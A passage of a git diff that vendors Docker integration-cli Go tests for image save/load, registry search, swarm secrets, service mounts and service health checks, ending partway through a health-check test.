check.Commentf("failed to open %s: %s", layerPath, err)) + defer f.Close() + + entries, err := listTar(f) + for _, e := range entries { + if !strings.Contains(e, "dev/") { + entriesSansDev = append(entriesSansDev, e) + } + } + c.Assert(err, checker.IsNil, check.Commentf("encountered error while listing tar entries: %s", err)) + + if reflect.DeepEqual(entriesSansDev, layerEntries) || reflect.DeepEqual(entriesSansDev, layerEntriesAUFS) { + found = true + break + } + } + } + + c.Assert(found, checker.Equals, true, check.Commentf("failed to find the layer with the right content listing")) + +} + +// Test loading a weird image where one of the layers is of zero size. +// The layer.tar file is actually zero bytes, no padding or anything else. +// See issue: 18170 +func (s *DockerSuite) TestLoadZeroSizeLayer(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerCmd(c, "load", "-i", "fixtures/load/emptyLayer.tar") +} + +func (s *DockerSuite) TestSaveLoadParents(c *check.C) { + testRequires(c, DaemonIsLinux) + + makeImage := func(from string, addfile string) string { + var ( + out string + ) + out, _ = dockerCmd(c, "run", "-d", from, "touch", addfile) + cleanedContainerID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "commit", cleanedContainerID) + imageID := strings.TrimSpace(out) + + dockerCmd(c, "rm", "-f", cleanedContainerID) + return imageID + } + + idFoo := makeImage("busybox", "foo") + idBar := makeImage(idFoo, "bar") + + tmpDir, err := ioutil.TempDir("", "save-load-parents") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir) + + c.Log("tmpdir", tmpDir) + + outfile := filepath.Join(tmpDir, "out.tar") + + dockerCmd(c, "save", "-o", outfile, idBar, idFoo) + dockerCmd(c, "rmi", idBar) + dockerCmd(c, "load", "-i", outfile) + + inspectOut := inspectField(c, idBar, "Parent") + c.Assert(inspectOut, checker.Equals, idFoo) + + inspectOut = inspectField(c, idFoo, "Parent") + c.Assert(inspectOut, checker.Equals, "") +} + +func (s *DockerSuite) TestSaveLoadNoTag(c *check.C) { + testRequires(c, DaemonIsLinux) + + name := "saveloadnotag" + + _, err := buildImage(name, "FROM busybox\nENV foo=bar", true) + c.Assert(err, checker.IsNil, check.Commentf("%v", err)) + + id := inspectField(c, name, "Id") + + // Test to make sure that save w/o name just shows imageID during load + out, _, err := runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", id), + exec.Command(dockerBinary, "load")) + c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err)) + + // Should not show 'name' but should show the image ID during the load + c.Assert(out, checker.Not(checker.Contains), "Loaded image: ") + c.Assert(out, checker.Contains, "Loaded image ID:") + c.Assert(out, checker.Contains, id) + + // Test to make sure that save by name shows that name during load + out, _, err = runCommandPipelineWithOutput( + exec.Command(dockerBinary, "save", name), + exec.Command(dockerBinary, "load")) + c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err)) + c.Assert(out, checker.Contains, "Loaded image: "+name+":latest") + c.Assert(out, checker.Not(checker.Contains), "Loaded image ID:") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go new file mode 100644 index 0000000000..22445e5bbe --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go @@ -0,0 +1,109 @@ +// +build !windows + +package main + +import ( + "context" + "fmt" + "io/ioutil" + "os" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" + "github.com/kr/pty" +) + +// save a repo and try to load it using stdout +func (s *DockerSuite) TestSaveAndLoadRepoStdout(c *check.C) { + name := "test-save-and-load-repo-stdout" + dockerCmd(c, "run", "--name", name, "busybox", "true") + + repoName := "foobar-save-load-test" + before, _ := dockerCmd(c, "commit", name, repoName) + before = strings.TrimRight(before, "\n") + + tmpFile, err := ioutil.TempFile("", "foobar-save-load-test.tar") + c.Assert(err, check.IsNil) + defer os.Remove(tmpFile.Name()) + + saveCmd := exec.Command(dockerBinary, "save", repoName) + saveCmd.Stdout = tmpFile + + _, err = runCommand(saveCmd) + c.Assert(err, check.IsNil) + + tmpFile, err = os.Open(tmpFile.Name()) + c.Assert(err, check.IsNil) + defer tmpFile.Close() + + deleteImages(repoName) + + loadCmd := exec.Command(dockerBinary, "load") + loadCmd.Stdin = tmpFile + + out, _, err := runCommandWithOutput(loadCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + + after := inspectField(c, repoName, "Id") + after = strings.TrimRight(after, "\n") + + c.Assert(after, check.Equals, before) //inspect is not the same after a save / load + + deleteImages(repoName) + + pty, tty, err := pty.Open() + c.Assert(err, check.IsNil) + cmd := exec.Command(dockerBinary, "save", repoName) + cmd.Stdin = tty + cmd.Stdout = tty + cmd.Stderr = tty + c.Assert(cmd.Start(), check.IsNil) + c.Assert(cmd.Wait(), check.NotNil) //did not break writing to a TTY + + buf := make([]byte, 1024) + + n, err := pty.Read(buf) + c.Assert(err, check.IsNil) //could not read tty output + c.Assert(string(buf[:n]), checker.Contains, "Cowardly refusing", check.Commentf("help output is not being yielded", out)) +} + +func (s *DockerSuite) TestSaveAndLoadWithProgressBar(c *check.C) { + name := "test-load" + _, err := buildImage(name, ` + FROM busybox + RUN touch aa + `, true) + c.Assert(err, check.IsNil) + + tmptar := name + ".tar" + dockerCmd(c, "save", "-o", tmptar, name) + defer os.Remove(tmptar) + + dockerCmd(c, "rmi", name) + dockerCmd(c, "tag", "busybox", name) + out, _ := dockerCmd(c, "load", "-i", tmptar) + expected := fmt.Sprintf("The image %s:latest already exists, renaming the old one with ID", name) + c.Assert(out, checker.Contains, expected) +} + +// fail because load didn't receive data from stdin +func (s *DockerSuite) TestLoadNoStdinFail(c *check.C) { + pty, tty, err := pty.Open() + c.Assert(err, check.IsNil) + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + cmd := exec.CommandContext(ctx, dockerBinary, "load") + cmd.Stdin = tty + cmd.Stdout = tty + cmd.Stderr = tty + c.Assert(cmd.Run(), check.NotNil) // docker-load should fail + + buf := make([]byte, 1024) + + n, err := pty.Read(buf) + c.Assert(err, check.IsNil) //could not read tty output + c.Assert(string(buf[:n]), checker.Contains, "requested load from stdin, but stdin is empty") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go new file mode 100644 index 0000000000..5a32f2ab93 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go @@ -0,0 +1,131 @@ +package main + +import ( + "fmt" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// search for repos named "registry" on the central registry +func (s *DockerSuite) TestSearchOnCentralRegistry(c *check.C) { + testRequires(c, Network, DaemonIsLinux) + + out, _ := dockerCmd(c, "search", "busybox") + c.Assert(out, checker.Contains, "Busybox base image.", check.Commentf("couldn't find any repository named (or containing) 'Busybox base image.'")) +} + +func (s *DockerSuite) TestSearchStarsOptionWithWrongParameter(c *check.C) { + out, _, err := dockerCmdWithError("search", "--filter", "stars=a", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Invalid filter", check.Commentf("couldn't find the invalid filter warning")) + + out, _, err = dockerCmdWithError("search", "-f", "stars=a", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Invalid filter", check.Commentf("couldn't find the invalid filter warning")) + + out, _, err = dockerCmdWithError("search", "-f", "is-automated=a", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Invalid filter", check.Commentf("couldn't find the invalid filter warning")) + + out, _, err = dockerCmdWithError("search", "-f", "is-official=a", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Invalid filter", check.Commentf("couldn't find the invalid filter warning")) + + // -s --stars deprecated since Docker 1.13 + out, _, err = dockerCmdWithError("search", "--stars=a", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "invalid syntax", check.Commentf("couldn't find the invalid value warning")) + + // -s --stars deprecated since Docker 1.13 + out, _, err = dockerCmdWithError("search", "-s=-1", "busybox") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "invalid syntax", check.Commentf("couldn't find the invalid value warning")) +} + +func (s *DockerSuite) TestSearchCmdOptions(c *check.C) { + testRequires(c, Network, DaemonIsLinux) + + out, _ := dockerCmd(c, "search", "--help") + c.Assert(out, checker.Contains, "Usage:\tdocker search [OPTIONS] TERM") + + outSearchCmd, _ := dockerCmd(c, "search", "busybox") + outSearchCmdNotrunc, _ := dockerCmd(c, "search", "--no-trunc=true", "busybox") + + c.Assert(len(outSearchCmd) > len(outSearchCmdNotrunc), check.Equals, false, check.Commentf("The no-trunc option can't take effect.")) + + outSearchCmdautomated, _ := dockerCmd(c, "search", "--filter", "is-automated=true", "busybox") //The busybox is a busybox base image, not an AUTOMATED image. + outSearchCmdautomatedSlice := strings.Split(outSearchCmdautomated, "\n") + for i := range outSearchCmdautomatedSlice { + c.Assert(strings.HasPrefix(outSearchCmdautomatedSlice[i], "busybox "), check.Equals, false, check.Commentf("The busybox is not an AUTOMATED image: %s", outSearchCmdautomated)) + } + + outSearchCmdNotOfficial, _ := dockerCmd(c, "search", "--filter", "is-official=false", "busybox") //The busybox is a busybox base image, official image. + outSearchCmdNotOfficialSlice := strings.Split(outSearchCmdNotOfficial, "\n") + for i := range outSearchCmdNotOfficialSlice { + c.Assert(strings.HasPrefix(outSearchCmdNotOfficialSlice[i], "busybox "), check.Equals, false, check.Commentf("The busybox is not an OFFICIAL image: %s", outSearchCmdNotOfficial)) + } + + outSearchCmdOfficial, _ := dockerCmd(c, "search", "--filter", "is-official=true", "busybox") //The busybox is a busybox base image, official image. + outSearchCmdOfficialSlice := strings.Split(outSearchCmdOfficial, "\n") + c.Assert(outSearchCmdOfficialSlice, checker.HasLen, 3) // 1 header, 1 line, 1 carriage return + c.Assert(strings.HasPrefix(outSearchCmdOfficialSlice[1], "busybox "), check.Equals, true, check.Commentf("The busybox is an OFFICIAL image: %s", outSearchCmdNotOfficial)) + + outSearchCmdStars, _ := dockerCmd(c, "search", "--filter", "stars=2", "busybox") + c.Assert(strings.Count(outSearchCmdStars, "[OK]") > strings.Count(outSearchCmd, "[OK]"), check.Equals, false, check.Commentf("The quantity of images with stars should be less than that of all images: %s", outSearchCmdStars)) + + dockerCmd(c, "search", "--filter", "is-automated=true", "--filter", "stars=2", "--no-trunc=true", "busybox") + + // --automated deprecated since Docker 1.13 + outSearchCmdautomated1, _ := dockerCmd(c, "search", "--automated=true", "busybox") //The busybox is a busybox base image, not an AUTOMATED image. + outSearchCmdautomatedSlice1 := strings.Split(outSearchCmdautomated1, "\n") + for i := range outSearchCmdautomatedSlice1 { + c.Assert(strings.HasPrefix(outSearchCmdautomatedSlice1[i], "busybox "), check.Equals, false, check.Commentf("The busybox is not an AUTOMATED image: %s", outSearchCmdautomated)) + } + + // -s --stars deprecated since Docker 1.13 + outSearchCmdStars1, _ := dockerCmd(c, "search", "--stars=2", "busybox") + c.Assert(strings.Count(outSearchCmdStars1, "[OK]") > strings.Count(outSearchCmd, "[OK]"), check.Equals, false, check.Commentf("The quantity of images with stars should be less than that of all images: %s", outSearchCmdStars1)) + + // -s --stars deprecated since Docker 1.13 + dockerCmd(c, "search", "--stars=2", "--automated=true", "--no-trunc=true", "busybox") +} + +// search for repos which start with "ubuntu-" on the central registry +func (s *DockerSuite) TestSearchOnCentralRegistryWithDash(c *check.C) { + testRequires(c, Network, DaemonIsLinux) + + dockerCmd(c, "search", "ubuntu-") +} + +// test case for #23055 +func (s *DockerSuite) TestSearchWithLimit(c *check.C) { + testRequires(c, Network, DaemonIsLinux) + + limit := 10 + out, _, err := dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") + c.Assert(err, checker.IsNil) + outSlice := strings.Split(out, "\n") + c.Assert(outSlice, checker.HasLen, limit+2) // 1 header, 1 carriage return + + limit = 50 + out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") + c.Assert(err, checker.IsNil) + outSlice = strings.Split(out, "\n") + c.Assert(outSlice, checker.HasLen, limit+2) // 1 header, 1 carriage return + + limit = 100 + out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") + c.Assert(err, checker.IsNil) + outSlice = strings.Split(out, "\n") + c.Assert(outSlice, checker.HasLen, limit+2) // 1 header, 1 carriage return + + limit = 0 + out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") + c.Assert(err, checker.Not(checker.IsNil)) + + limit = 200 + out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") + c.Assert(err, checker.Not(checker.IsNil)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go new file mode 100644 index 0000000000..b79fdbeb59 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go @@ -0,0 +1,131 @@ +// +build !windows + +package main + +import ( + "io/ioutil" + "os" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestSecretCreate(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secret := d.getSecret(c, id) + c.Assert(secret.Spec.Name, checker.Equals, testName) +} + +func (s *DockerSwarmSuite) TestSecretCreateWithLabels(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + Labels: map[string]string{ + "key1": "value1", + "key2": "value2", + }, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secret := d.getSecret(c, id) + c.Assert(secret.Spec.Name, checker.Equals, testName) + c.Assert(len(secret.Spec.Labels), checker.Equals, 2) + c.Assert(secret.Spec.Labels["key1"], checker.Equals, "value1") + c.Assert(secret.Spec.Labels["key2"], checker.Equals, "value2") +} + +// Test case for 28884 +func (s *DockerSwarmSuite) TestSecretCreateResolve(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "foo" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: name, + }, + []byte("foo"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + fake := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: id, + }, + []byte("fake foo"), + }) + c.Assert(fake, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", fake)) + + out, err := d.Cmd("secret", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + c.Assert(out, checker.Contains, fake) + + out, err = d.Cmd("secret", "rm", id) + c.Assert(out, checker.Contains, id) + + // Fake one will remain + out, err = d.Cmd("secret", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) + c.Assert(out, checker.Contains, fake) + + // Remove based on name prefix of the fake one + // (which is the same as the ID of foo one) should not work + // as search is only done based on: + // - Full ID + // - Full Name + // - Partial ID (prefix) + out, err = d.Cmd("secret", "rm", id[:5]) + c.Assert(out, checker.Not(checker.Contains), id) + out, err = d.Cmd("secret", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) + c.Assert(out, checker.Contains, fake) + + // Remove based on ID prefix of the fake one should succeed + out, err = d.Cmd("secret", "rm", fake[:5]) + c.Assert(out, checker.Contains, fake) + out, err = d.Cmd("secret", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) + c.Assert(out, checker.Not(checker.Contains), id) + c.Assert(out, checker.Not(checker.Contains), fake) +} + +func (s *DockerSwarmSuite) TestSecretCreateWithFile(c *check.C) { + d := s.AddDaemon(c, true, true) + + testFile, err := ioutil.TempFile("", "secretCreateTest") + c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) + defer os.Remove(testFile.Name()) + + testData := "TESTINGDATA" + _, err = testFile.Write([]byte(testData)) + c.Assert(err, checker.IsNil, check.Commentf("failed to write to temporary file")) + + testName := "test_secret" + out, err := d.Cmd("secret", "create", testName, testFile.Name()) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "", check.Commentf(out)) + + id := strings.TrimSpace(out) + secret := d.getSecret(c, id) + c.Assert(secret.Spec.Name, checker.Equals, testName) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go new file mode 100644 index 0000000000..0985a2bd59 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go @@ -0,0 +1,68 @@ +// +build !windows + +package main + +import ( + "encoding/json" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestSecretInspect(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secret := d.getSecret(c, id) + c.Assert(secret.Spec.Name, checker.Equals, testName) + + out, err := d.Cmd("secret", "inspect", testName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var secrets []swarm.Secret + c.Assert(json.Unmarshal([]byte(out), &secrets), checker.IsNil) + c.Assert(secrets, checker.HasLen, 1) +} + +func (s *DockerSwarmSuite) TestSecretInspectMultiple(c *check.C) { + d := s.AddDaemon(c, true, true) + + testNames := []string{ + "test0", + "test1", + } + for _, n := range testNames { + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: n, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secret := d.getSecret(c, id) + c.Assert(secret.Spec.Name, checker.Equals, n) + + } + + args := []string{ + "secret", + "inspect", + } + args = append(args, testNames...) + out, err := d.Cmd(args...) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var secrets []swarm.Secret + c.Assert(json.Unmarshal([]byte(out), &secrets), checker.IsNil) + c.Assert(secrets, checker.HasLen, 2) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go new file mode 100644 index 0000000000..9e8b1e9956 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go @@ -0,0 +1,175 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestServiceCreateMountVolume(c *check.C) { + d := s.AddDaemon(c, true, true) + out, err := d.Cmd("service", "create", "--mount", "type=volume,source=foo,target=/foo,volume-nocopy", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.getServiceTasks(c, id) + return len(tasks) > 0, nil + }, checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus.ContainerID == "" { + task = d.getTask(c, task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus.ContainerID != "", nil + }, checker.Equals, true) + + // check container mount config + out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .HostConfig.Mounts}}", task.Status.ContainerStatus.ContainerID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var mountConfig []mount.Mount + c.Assert(json.Unmarshal([]byte(out), &mountConfig), checker.IsNil) + c.Assert(mountConfig, checker.HasLen, 1) + + c.Assert(mountConfig[0].Source, checker.Equals, "foo") + c.Assert(mountConfig[0].Target, checker.Equals, "/foo") + c.Assert(mountConfig[0].Type, checker.Equals, mount.TypeVolume) + c.Assert(mountConfig[0].VolumeOptions, checker.NotNil) + c.Assert(mountConfig[0].VolumeOptions.NoCopy, checker.True) + + // check container mounts actual + out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .Mounts}}", task.Status.ContainerStatus.ContainerID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var mounts []types.MountPoint + c.Assert(json.Unmarshal([]byte(out), &mounts), checker.IsNil) + c.Assert(mounts, checker.HasLen, 1) + + c.Assert(mounts[0].Type, checker.Equals, mount.TypeVolume) + c.Assert(mounts[0].Name, checker.Equals, "foo") + c.Assert(mounts[0].Destination, checker.Equals, "/foo") + c.Assert(mounts[0].RW, checker.Equals, true) +} + +func (s *DockerSwarmSuite) TestServiceCreateWithSecretSimple(c *check.C) { + d := s.AddDaemon(c, true, true) + + serviceName := "test-service-secret" + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + out, err := d.Cmd("service", "create", "--name", serviceName, "--secret", testName, "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.SecretReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 1) + + c.Assert(refs[0].SecretName, checker.Equals, testName) + c.Assert(refs[0].File, checker.Not(checker.IsNil)) + c.Assert(refs[0].File.Name, checker.Equals, testName) + c.Assert(refs[0].File.UID, checker.Equals, "0") + c.Assert(refs[0].File.GID, checker.Equals, "0") +} + +func (s *DockerSwarmSuite) TestServiceCreateWithSecretSourceTarget(c *check.C) { + d := s.AddDaemon(c, true, true) + + serviceName := "test-service-secret" + testName := "test_secret" + id := d.createSecret(c, swarm.SecretSpec{ + swarm.Annotations{ + Name: testName, + }, + []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + testTarget := "testing" + + out, err := d.Cmd("service", "create", "--name", serviceName, "--secret", fmt.Sprintf("source=%s,target=%s", testName, testTarget), "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.SecretReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 1) + + c.Assert(refs[0].SecretName, checker.Equals, testName) + c.Assert(refs[0].File, checker.Not(checker.IsNil)) + c.Assert(refs[0].File.Name, checker.Equals, testTarget) +} + +func (s *DockerSwarmSuite) TestServiceCreateMountTmpfs(c *check.C) { + d := s.AddDaemon(c, true, true) + out, err := d.Cmd("service", "create", "--mount", "type=tmpfs,target=/foo,tmpfs-size=1MB", "busybox", "sh", "-c", "mount | grep foo; tail -f /dev/null") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.getServiceTasks(c, id) + return len(tasks) > 0, nil + }, checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus.ContainerID == "" { + task = d.getTask(c, task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus.ContainerID != "", nil + }, checker.Equals, true) + + // check container mount config + out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .HostConfig.Mounts}}", task.Status.ContainerStatus.ContainerID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var mountConfig []mount.Mount + c.Assert(json.Unmarshal([]byte(out), &mountConfig), checker.IsNil) + c.Assert(mountConfig, checker.HasLen, 1) + + c.Assert(mountConfig[0].Source, checker.Equals, "") + c.Assert(mountConfig[0].Target, checker.Equals, "/foo") + c.Assert(mountConfig[0].Type, checker.Equals, mount.TypeTmpfs) + c.Assert(mountConfig[0].TmpfsOptions, checker.NotNil) + c.Assert(mountConfig[0].TmpfsOptions.SizeBytes, checker.Equals, int64(1048576)) + + // check container mounts actual + out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .Mounts}}", task.Status.ContainerStatus.ContainerID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var mounts []types.MountPoint + c.Assert(json.Unmarshal([]byte(out), &mounts), checker.IsNil) + c.Assert(mounts, checker.HasLen, 1) + + c.Assert(mounts[0].Type, checker.Equals, mount.TypeTmpfs) + c.Assert(mounts[0].Name, checker.Equals, "") + c.Assert(mounts[0].Destination, checker.Equals, "/foo") + c.Assert(mounts[0].RW, checker.Equals, true) + + out, err = s.nodeCmd(c, task.NodeID, "logs", task.Status.ContainerStatus.ContainerID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.HasPrefix, "tmpfs on /foo type tmpfs") + c.Assert(strings.TrimSpace(out), checker.Contains, "size=1024k") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go new file mode 100644 index 0000000000..30580f6be3 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go @@ -0,0 +1,191 @@ +// +build !windows + +package main + +import ( + "strconv" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/executor/container" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// start a service, and then make its task unhealthy during running +// finally, unhealthy task should be detected and killed +func (s *DockerSwarmSuite) TestServiceHealthRun(c *check.C) { + testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows + + d := s.AddDaemon(c, true, true) + + // build image with health-check + // note: use `daemon.buildImageWithOut` to build, do not use `buildImage` to build + imageName := "testhealth" + _, _, err := d.buildImageWithOut(imageName, + `FROM busybox + RUN touch /status + HEALTHCHECK --interval=1s --timeout=1s --retries=1\ + CMD cat /status`, + true) + c.Check(err, check.IsNil) + + serviceName := "healthServiceRun" + out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.getServiceTasks(c, id) + return tasks, nil + }, checker.HasLen, 1) + + task := tasks[0] + + // wait for task to start + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + task = d.getTask(c, task.ID) + return task.Status.State, nil + }, checker.Equals, swarm.TaskStateRunning) + containerID := task.Status.ContainerStatus.ContainerID + + // wait for container to be healthy + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + out, _ := d.Cmd("inspect", "--format={{.State.Health.Status}}", containerID) + return strings.TrimSpace(out), nil + }, checker.Equals, "healthy") + + // make it fail + d.Cmd("exec", containerID, "rm", "/status") + // wait for container to be unhealthy + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + out, _ := d.Cmd("inspect", "--format={{.State.Health.Status}}", containerID) + return strings.TrimSpace(out), nil + }, checker.Equals, "unhealthy") + + // Task should be terminated + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + task = d.getTask(c, task.ID) + return task.Status.State, nil + }, checker.Equals, swarm.TaskStateFailed) + + if !strings.Contains(task.Status.Err, container.ErrContainerUnhealthy.Error()) { + c.Fatal("unhealthy task exits because of other error") + } +} + +// start a service whose task is unhealthy at beginning +// its tasks should be blocked in starting stage, until health check is passed +func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) { + testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows + + d := s.AddDaemon(c, true, true) + + // service started from this image won't pass health check + imageName := "testhealth" + _, _, err := d.buildImageWithOut(imageName, + `FROM busybox + HEALTHCHECK --interval=1s --timeout=1s --retries=1024\ + CMD cat /status`, + true) + c.Check(err, check.IsNil) + + serviceName := "healthServiceStart" + out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.getServiceTasks(c, id) + return tasks, nil + }, checker.HasLen, 1) + + task := tasks[0] + + // wait for task to start + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + task = d.getTask(c, task.ID) + return task.Status.State, nil + }, checker.Equals, 